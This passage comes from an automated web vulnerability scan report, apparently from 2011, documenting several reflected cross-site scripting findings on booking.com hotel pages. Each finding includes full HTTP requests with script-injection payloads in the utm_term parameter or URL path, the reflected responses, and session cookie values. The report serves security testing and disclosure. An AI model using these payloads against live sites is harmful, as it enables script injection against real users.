X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232453
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
ndo';


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/hotel/us/c-boston-massachusettes.en.html?utm_content=text-cr;utm_medium=SPPC;utm_source=tripad5a8c0'-alert(1)-'25e8e054b4e;utm_term=hotel-59554';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.group_room = 'Room';
booking.env.group_remove = 'Remove';


bookin
...[SNIP]...

4.192. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_term parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the utm_term request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cedf9"><script>alert(1)</script>8c314782dd2 was submitted in the utm_term parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554cedf9"><script>alert(1)</script>8c314782dd2&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:13:22 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YV721dMcSbN4sTMjg6DJx7HaHS0Wu0DonGruQ19C5%2FA2qwp1uvnNC5LVmEZc%2FtD1X1w4xTGvBb2G71SGaRMBvID57Yanw9uScUOt940TVeeaUgqpS1YShC4kjKNg57XijsKAC2j2mwWCKDGStgBC6sTjB3%2FWgfEM87EKWcRIJyqg0GEKabkj9CEJEyWm04nb9QB%2BQ84LCo7LgTfGOHW7BiixkUqVZAydOmJ1X8u4P5PXNBllvMUdAPeuPsD%2B8lnVUNG3trDLVacg0NzPDp27DiAsrAttvm6a%2BVrBtOS6LZZ%2F5jRj%2BdtGwRN1k9R8PWj%2Fm47Mz3uilEy1jl4sZvvApowYkUymolIit0e8S6zt8yNjVHZql7jwEJN%2FJOXf3HaA7Y71wtiPNPFlVAu%2Bm55r4A%2FxyfLargsHl%2BsHVpzGdL1osyPN7t7enDzwE7hs2PvqTyD72vu2ah2tgYhoZQ0ZQVumaIHfeyUB%2Fp2hjdMRBtoDvfoei%2BuJzbvGsgYsGU0pVIp0Ofg5WXmVDub3Zc3tMFq4nEx8y3OepEoByBFm3CJAB7HTbSOEfSGS2AlYi3OPjpwU1iNblWEnUrMvHO%2BiOi2rqvgNHKQWixtu4LttcQnPtSr84YM3Wnn9kxiJLAW6g%2B3RtALfxU4%2BB2Bou%2FvyeMTDC%2Bggu%2FfI%2FhsBlsiQ40BEkdZkUAOA8eEbGBtTeKW2vx2PXG%2BCYrM3mQdB4gctyHXkS8WnJ%2F%2BaRmm7Sx3ytJ%2FzAafSldVeHoXDlneYtnEXkmQE32nYXgvhkRShU3Z97KIlGwpmjnkSFrawo2DWkRnhtZHzv%2FlHJ7nx4iNBLh0Uc8EJnpC3vINgBoBpFdiYOXh8HWtd%2BN2H9KK1Rb4dgioB0WAOOAj13oJuoDsbzEuXm91M4Yq8QgV8NDyjHv4fDd5sLK52Tm1P5VCYO6Z69%2BI4Aj5%2BquAS4YAFrhhxylbk1L65zXIxgImh48LSoZ71Yz7BcRKOwknLSuDxLkEM%2BiLSz1%2F2AN7ZgS103Yiv0VL44J77suOWr9l67IAC0Q6KlryEg%2F0t44%2Bl79vORzDB55izUvMZ9mmSXYTZf4zP3iKLXSKKiLOMHlGCGiwFgmEa3F%2BGl85BmDTIO1%2FZuUcPEB7N05hzkOeUp8FrCGjOhxbJ09HRfImLIXGLOm64a77thIs2%2ByiGHTCJXVjdnBkRSk6lG7RP3SjyaXMJzQLEwHkCQj2Kl92AJGH4cidRRNZb8iY3bSElGheUtnAKhVacsvNdG82M%2B4ffDGCG%2FatAP7y5TjLj3Vo7adlzV%2BfeKQ%2FYuE%2FEA9f10UyK7%2FjegYi2T%2BVn9HR7vDLADrxgYzEDp4s0BKSaD6ybuIhFLFpx8kdHgzMd2TYd%2BqJ4IA%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:13:23 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232636
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<link rel="canonical" href="http://www.booking.com/hotel/us/c-boston-massachusettes.en.html?utm_content=text-cr;utm_medium=SPPC;utm_source=tripad;utm_term=hotel-59554cedf9"><script>alert(1)</script>8c314782dd2" />
...[SNIP]...

4.193. http://www.booking.com/hotel/us/c-boston-massachusettes.html [utm_term parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/c-boston-massachusettes.html

Issue detail

The value of the utm_term request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 638b3'-alert(1)-'dc24a3dc444 was submitted in the utm_term parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel/us/c-boston-massachusettes.html?aid=323804&label=hotel-59554&utm_source=tripad&utm_medium=SPPC&utm_content=text-cr&utm_term=hotel-59554638b3'-alert(1)-'dc24a3dc444&do_availability_check=on&checkin_monthday=14&checkin_year_month=2011-10&checkout_monthday=16&checkout_year_month=2011-10&lang=en HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YaNxdhP7xmK4yN03wNIlijw%2BT9XsLDnOkTqGuQa01h6WALxBj1G62mHoSU9E8qAx3cduYc0vRkNEuH8NfvyKIlabz%2BlUU5qS9E8GtIdLbfJeDCyWflO6R7Dk2HOdDocMcJtk%2FxRPR%2Bq9g5rbhO7ZoXEpDQjpZQvPzv%2FmD9XqWEjXnonoa%2FbRSB98%2B7ZZGM3kuu8nMNdGp9sB3iRL4pfrA6esNr33X%2FDEaoNU6saOCrIROayHMkaQqFJIr1iQro7DF9iAV7DFrO4YABP7EvodoYCxiHGmfzvKr%2F81fi3OaKshuN0rXT%2FdZRpQme99%2Bs6ltZqWkj8XxZjiX2SRX7RZ79WMrTc6WYanwe7kBlv70kL7Ke%2FkEY7BlsvFdfD8t6Mh4gGgM%2Fr9bo2KyJbzl8qDPKhyL%2F8jfuk2yjh9unf7aLSUWs5BTakcWnUPI%2BHWSf4P1yZxk6AvgdMuXTHMAPJQ0Cu22tPkLtaYLXTwieKU1zcKpmp3cdC9GqScFQC2278B2l2HyXpyJ%2BnafFao4AK8CvNjPN%2BA5tlOkBeXQqVsZsmUQpVM5TfBwl%2FmRfUQfPYDKIsgmVn2RjYo%2F2vewX5iVrE%2BRTccylrcSKLQGe8j1y7hbmDTrhP87PPGpULeoxdvUxOw%2B3dUtfOrZ2BU88HBMzDMD1q1gLU8gQ4T7h6MCUElsT9xPQ%2FAxc7AFvUv8NUP4nJ3weLS%2FoGDz%2Fo%2BDm0n0PBP6h%2F5cd%2FPP%2BBNClxOUUI9%2BAEveh1Z%2B%2BNrJ6KM6xqVJEUJ%2BdMy7iXIYiMsibb6fB0TDVVFYV3wjFdMrW%2BR93111FBlKCihmmWzGn2ItPFKVp1%2BgH3tOcM84%2FehBqRsbDqS7I6mS5Q0McFlYvLMCvklo%2FaVWz706pabDoXdMJpHioNusIOid7dZ8yfDOvabv4KD1qlpasYpO0vinMnuFIWL%2BJma%2BjnXX3%2FpDIqrrzoc8hNB02nKzcbjpcxUCsvy%2BGT%2BVbRlWg0GLlI8%2F4jqevTysmbP58iEuFmMlrZYnMU4ppoN%2BJFKg9oSNZb0EBQIk2KOd4Xikobc2h33as0YUHhDpdNOmTHo1pFhtYcjxSmos9e%2BddSMpk3CapCw%2FZwPAutINGfp4EGLk0WIirA2hH8oWEASEP6EYuLCVoOdkGhi%2FlMZEuEqHDd9QPzEKtr0jVn2oB%2FuoNJMNl1%2BO2SEQGnoMW0duRWtBM17R%2FvHxE1Q4v2gh8AsTPtUw2RJ61%2F9riuutW31NW1%2Fw4dhhcgUpszeIErrMcK8yO5mXo05t5lcOBDOF7Gckx1dpfuAj1Zlio0XSZLa3hvH1FEXrM56PQGSwAxgWQ72jxDiPwGMA%2B3hy%2B5Z2hjzDbMzbsGrV%2B5CtuNI%2FnERG87Xos73Rvj5FyFbp3Rc7O5tLW6FVMbfJeiAu7ur%2Fw%2FxFSP8SX9mVWEt6BU%3D; BJS=-; ramala=2095.91165208817; __utma=1.1339354214.1317600621.1317600621.1317603252.2; __utmb=1.4.9.1317603309627; __utmc=1; __utmz=1.1317603252.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 01:13:31 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YdL0X2loyNGhkfPO6rvm8O2ZG3z%2BcatT%2B17ujnQNiNZeBAm%2FryzeQMya5S9PYPdK6inPiSJW3j1s0Wvwn%2FGlx5Ue2lu7qA1TICmOgWlTu%2FlSRUjk499sydT6gBGxPzpuukBKklZsdYu0viaHHNTsZ6Gt6LHIm5nSIp9mCRHJEh9gy3%2BrRkNKcw1CltVIAZHTHazUnSpInDMHKdpQJxqMEajQBL131rhAMIO7osOTfUUl1%2FUsySE6QzemE8tUy4qelKOg3aDBUF5%2BXDnaDYzYWBTzovMfNCeQY1u3OFu%2FcrE0EbDS7%2BsaFvZ8u%2B1g66aXjwx%2FG91a3X8yALwcRe%2Bwpw3vobKW9Fr%2FGAtK1uN3AscnAMvpTGmyjMIDZn%2FH6eLbGNVy2ZShVXkw3izHSnMuDlUoeyKrsnO3UQkewK1rg13HZ2Iay%2Fn3Az87x7qgV%2BDRapI1aR7wAZmZq3dXL4Hd0i2o1PbYlcxcgB4ZDyv2ZBMkKq2Uz%2FYcKq2FnRPVsdWqq%2F2YDjvpE5ELEFVOHHRYCjkeNoFZ%2BgMJoi8Ue5Mecu4tLrLC9tvEvev%2BmBiHArB7iLDR5mhtLZGZ9CKygkYtLH%2Fk30R3igE9lYLWIhNfO2qlIqPwFNYzGXm1bWEPvRsMX3sBKtsI3hmJASucc%2B1tPmN9%2FZSboQ4bNnWfAB6hOd7nJQadud%2Ftn%2BDjDEu%2BYk3YpTD%2FF0n%2FVmDmr34WwAqNnfETOhiCvrgIWrS3r9o4wiPtL26x5DqqSzeHMdJu7oJL0s1ssIMrnCEen9An2TSbCFiCd9b1IX1h6LUIjQN7VWFvawxbx3sa%2B5K%2FOaaNFNTTXzwZVL%2FDWsT9YDxeQrY%2BxIChN79XY5IwcEfUVE3i9HJCS%2BIKmfL7zItu4AAlIbZ%2FiwZpe9eGHHXUJ1BpWiiCjSDsmLHxu4ZfqctRRH6OhvatAkHnz%2F5LYttoEBM6CLX0GciN6Rk679m2WVeATkk00PpkQBb978QBaKP8d9x8bcVZBaEvTgXPykG%2F5ulg0dhDMIJrFZ%2BA7LVaUh%2F%2F8JIZp0jP455hs%2FKN2BcBYlOEQPGB3wjSIJMxeyGXukprBnChj9BQTDFPocSZY1ZPDZJwwgMz9CchsLYRanHYnlrP3mcUmoWNbB1vVgwKGTbSQ8Q2FmaLNFqzxCxYKUQHovVPYO93Uy4vZUpH8dlh5ChpkOO4grRqL%2BC%2FnBjswCnn8uITaR6FxTobzUuFfam3zz7%2BhIMVxl1DHkGzbHpAnNLx%2B74Di8weWeC2vnlqT6V1dM36RWt0d1t8BDm0molUuqlbGI0Bzg2JbvsqBhEkdq9qi%2FbabJpWiZCtfwoXNC4YttZwGrz9w5uoSvTe8LpLLcqSAJ4E9pkux747Cg%3D%3D; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 01:13:31 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 232453
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/hotel/us/c-boston-massachusettes.en.html?utm_content=text-cr;utm_medium=SPPC;utm_source=tripad;utm_term=hotel-59554638b3'-alert(1)-'dc24a3dc444';
booking.env.b_canonical_url_delimiter = ';';
booking.env.b_query_params_delimiter = ';';


booking.env.group_room = 'Room';
booking.env.group_remove = 'Remove';


booking.env.b_southwest_lon
...[SNIP]...

4.194. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 57fab'%3balert(1)//5fbdabc63bf was submitted in the REST URL parameter 1. This input was echoed as 57fab';alert(1)//5fbdabc63bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /hotel57fab'%3balert(1)//5fbdabc63bf/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:19:15 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55874
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
ooking.env.b_site_experiment_event_tracking = true;


booking.env.b_room_groups = [];


booking.env.b_site_experiment_short_url = 1;
booking.env.b_canonical_url = 'http://www.booking.com/hotel57fab';alert(1)//5fbdabc63bf/us/copley-square.en.html';
booking.env.b_canonical_url_delimiter = '?';
booking.env.b_query_params_delimiter = ';';


booking.env.group_room = 'Room';
booking.env.group_remove = 'Remove';


book
...[SNIP]...

4.195. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf755"><script>alert(1)</script>61a65b853c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotelcf755"><script>alert(1)</script>61a65b853c8/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YTy%2FH5yBSVDZyJCmZ%2BDk5bYa9MOaX5Ohuc%2Bb7bVvro1WMwM53rvP6zhshSadTGG8grffhffZ5TrtEaE1N785Up%2Bwzqmt0Pc7CLNl%2BldsxU8UjI6BFbxd%2FXMtXmEDQC6BPG3kNOtQtyD01toJ2ys%2FpAdAEVrmeuF4Mjj%2BtSpaVIFAYAer%2FApFiqN9QvpWYIg8%2FdncEGBc5gu1ghGE3uU0AbugSx%2BWEph1WiCD8x1C7KsGeLU7JL%2BfNGTD%2Bt9zPW1l8NdghYosSs0bpW7NIXHHsDcS5zXsObR%2FfB%2FYPfR23q7WE08DpbIPDsBVlgvUbzJAfWFvlI9JS3bQ4roZTL694KjMTzI825u4VpztwJlYqzTbOkZL27rtXDqtDJIJyCWq1m3azYWzMLksHdXkgR1wUg%2BtKrjdhXvlbJel%2BRzc3EM0D6M1hgFT6fPKvYtsCtG1G4nUH5sMq4PPaBCCrDVkzp3mgYLkcX3Ut2ycEldERdf8ZCZA%2FfbhacUqUDoMyquQ6VEjv932iDENEdVM%2BmkV%2FaD2unTB7pyFNVJu83BX7xoB3m8%2By6LbzAX9x62kK8hc0p3R8q3WWZ8yMX0F5Xk9Okjkkjno%2BKVykCfKpf5j6fotGSmRWmfwC4gDhAS8w5YE8YkauYGBmO5DtLR5bvnMuzVFEbPnETPSga5a1lbWu8yDJV6e0E0AjZ4WnGloHdzFlE73EAr1Dyw3chySZSfGNnkKWe3D40O7mI7c34kFgLdbFvWHLBBTtc11RlYTObtD0OlzP643j589WGLrr1rqv38L%2BYYsNFuy1obcl%2F8kBEUweGslRdybWdqzUpbypwdM9VGZnJwo4HFi2tJTYf0QlLM5ZZ6kIxOMY8LjZslxRkkay8uZAPxc%2FD6%2FcjgcKlO8%2FpDso6ozRYXNmcwyNbLAmxPf9nRHUcsyo%2BHMcxSGRcyqlKmJnLXlFC0OlyphT7RhSQcP5X6qTr296GmxFCp5XtZX6%2BrVLsF%2BWMZNOUK3Ozr7hVyCSKh73o7hrD4Kjim%2FAjr3DonlIbkjn%2BisMBj9Ia16EmNF1sk2AWXPKtAoY0I1sugnhiQP5tIUnhf7gczhMhF%2B9EW1I3dAC6wPJqpLvVGhmYy7q%2B9RGrQUN0b1UFT8dohsrpxSUsIoC6DKvUgvrW3eogyISoMIWq2XbuoLeZntnfhEosBS%2FdgkWWIWriBNhKFUUMALVURW7rjShDdFztph22anvO4ov%2Fv8GwOEy%2F55opMks6AejdXNhEf0RgprnOB4eZLvD5vn1jjbW8fRiF5TxxbsHUYWn1Z4LW9MuhtcKso2Sm6XIg%3D%3D; BJS=-; ramala=59.3484239578247; __utma=1.1339354214.1317600621.1317600621.1317600621.1; __utmb=1.1.10.1317600621; __utmc=1; __utmz=1.1317600621.1.1.utmcsr=igougo|utmccn=us|utmcmd=SPPC|utmctr=ufi-P20061717

Response

HTTP/1.1 404 Not Found
Date: Mon, 03 Oct 2011 00:19:08 GMT
Server: Apache
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 55958
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country_setvars.inc -->



...[SNIP]...
<meta property="og:url" content="http://www.booking.com/hotelcf755"><script>alert(1)</script>61a65b853c8/us/copley-square.html" />
...[SNIP]...

4.196. http://www.booking.com/hotel/us/copley-square.en-us.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.booking.com
Path:   /hotel/us/copley-square.en-us.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 259d8"><script>alert(1)</script>99180b375ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hotel/us259d8"><script>alert(1)</script>99180b375ff/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.booking.com/searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
